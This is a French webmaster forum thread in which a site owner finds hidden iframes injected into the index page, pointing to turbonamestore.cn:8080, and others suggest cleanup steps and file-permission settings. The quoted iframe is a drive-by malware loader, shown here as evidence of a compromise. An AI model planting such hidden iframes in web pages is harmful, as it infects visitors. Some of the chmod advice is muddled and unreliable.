Messages: 64

Enregistré le: 23 Juin 2008

Message le Sam Juin 20, 2009 9:25

bonjour
j'ai un souci
vraiment je ne sais pas d'où il vient le problème
chaque 2 jours
je trouve quelques balises que sont effacés et je trouve un autre code qui s'ajoute automatiquement juste en avant de <body>

voila le code
parfois:
<iframe src="http://turbonamestore.cn:8080/index.php" width=160 height=163 style="visibility: hidden"></iframe>
et parfois:
parfois:
<iframe src="http://javagoogle/index.php" width=160 height=163 style="visibility: hidden"></iframe>
je ne sais pas c'est quoi exactement ?sachant que la page index de site seulement que se change

y'a t 'il de réponse SVp ?
supposant que mon site est hacké quels sont les mesures à prendre pour le securiser complétement
sachant que je fais aujourd'hui le changement de mot de passe de ftp

est ce que ce problème peut être cause d'un mauvais script utiliser sachant qu'il a commencer dès mon installation d'un script de analytics (php-stats0-1.9.2
merci
cordialement
Haut
9 Réponses
Messages: 675

Enregistré le: 28 Avr 2007

Message le Sam Juin 20, 2009 10:06

Je pense que cette petite liste ne sera pas superflue :
  • Ré-uploader tout ton site en étant sûr que les fichiers sont sains
  • Changer ton mot de passe FTP
  • Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
  • Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
  • Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir ;)
Haut
Messages: 64

Enregistré le: 23 Juin 2008

Message le Sam Juin 20, 2009 10:39

darkjukka a écrit:Je pense que cette petite liste ne sera pas superflue :
  • Ré-uploader tout ton site en étant sûr que les fichiers sont sains
  • Changer ton mot de passe FTP
  • Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
  • Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
  • Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir ;)



bonjour
le chmod est par defaut chmod 777 sur le fichier
alors qu'est ce que je dois changer comme droit sur les fichiers?
et j'utilise aussi le fichier:
error401.html
error400.html
error403.html
error500.html
Haut
Messages: 675

Enregistré le: 28 Avr 2007

Message le Sam Juin 20, 2009 11:06

Oula 777 c'est le pire ! Tout le monde peut le modifier ;)
Passe le CHMOD à 404 ca ne sera que plus sécurisé.

Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^
Haut
Messages: 64

Enregistré le: 23 Juin 2008

Message le Sam Juin 20, 2009 11:52

darkjukka a écrit:Oula 777 c'est le pire ! Tout le monde peut le modifier ;)
Passe le CHMOD à 404 ca ne sera que plus sécurisé.

Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^


mais si je passe le CHMOD en 404 alors comme ca je n'aurais pas l'autirisation ni de modifier ni d'executer les fichiers et les dossier
c'est mieux de faire 704 n'est ce pas et est ce que je dois faire ca sur tous les fichiers et les dossiers c a d sur le dossier www?

merci

cordialement
Haut
Messages: 675

Enregistré le: 28 Avr 2007

Message le Sam Juin 20, 2009 12:20

Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau ;)
Haut
Messages: 64

Enregistré le: 23 Juin 2008

Message le Sam Juin 20, 2009 12:37

darkjukka a écrit:Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau ;)


et pusique je travail en plein temp sur le site
alors
à chaque remonte de fichier je dois changer l'accés?

bon pour le www je fais CHMOD 705
et pour les autres fichiers et dossiers je fais 755

que pensez vous comme ça?
y'a t 'il d'inconvénient?

merci
Haut
Messages: 675

Enregistré le: 28 Avr 2007

Message le Sam Juin 20, 2009 13:21

Ya pas d'inconvénients mais par contre j'ai pas compris la première partie de ton post, tu peux être plus clair ?
Haut
Messages: 3410

Enregistré le: 17 Mai 2005

Message le Sam Juin 20, 2009 19:25

Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777

je trouve que c'est mieux de travailler en htacces
Haut
Messages: 64

Enregistré le: 23 Juin 2008

Message le Dim Juin 21, 2009 8:58

mi-mi a écrit:Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777

je trouve que c'est mieux de travailler en htacces



bonjour
même avec le htaccess je va utiliser le CHMOD non?

sinon
je crois que je dois écrire dans chaque fichier :

-> AllowOverride All pour donner l'accées à tous
sinon comment faire pour definir l'accés au propriétaire de site , l'internaute et le groupe de travail

est ce qu'il est utile d'utiliser le .htpassword

merci
bye
Haut